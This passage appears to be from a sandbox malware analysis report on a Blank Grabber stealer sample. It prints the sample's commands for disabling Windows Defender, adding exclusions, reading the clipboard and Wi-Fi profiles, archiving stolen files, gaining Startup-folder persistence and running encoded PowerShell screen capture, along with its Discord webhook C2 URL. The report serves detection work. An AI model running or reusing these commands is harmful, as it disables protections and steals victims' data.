ZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8136, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", ProcessId: 7376, ProcessName: cmd.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8260, TargetFilename: C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *, ProcessId: 8568, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7512, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 1832, ProcessName: cmd.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: program.exe.7324.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM"}
              Multi AV Scanner detection for submitted file
              Source: program.exeReversingLabs: Detection: 44%
              Source: program.exeVirustotal: Detection: 46%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,83_2_00007FF64FE6901C
              Source: program.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: \t5.pdbj source: powershell.exe, 0000002A.00000002.1989050806.000001E9C9F48000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000001.00000002.2117447704.00007FFDFB2D2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdbhPE source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000053.00000000.2004144713.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdb source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000001.00000002.2122070037.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000001.00000002.2121630063.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, 00000001.00000002.2121042650.00007FFE11EA1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000001.00000002.2121890288.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000001.00000002.2122536379.00007FFE13301000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, 00000001.00000002.2122251570.00007FFE13201000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120647097.00007FFE0EB41000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000001.00000002.2120375422.00007FFE0E15E000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6B75083C0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7509280 FindFirstFileExW,FindClose,0_2_00007FF6B7509280
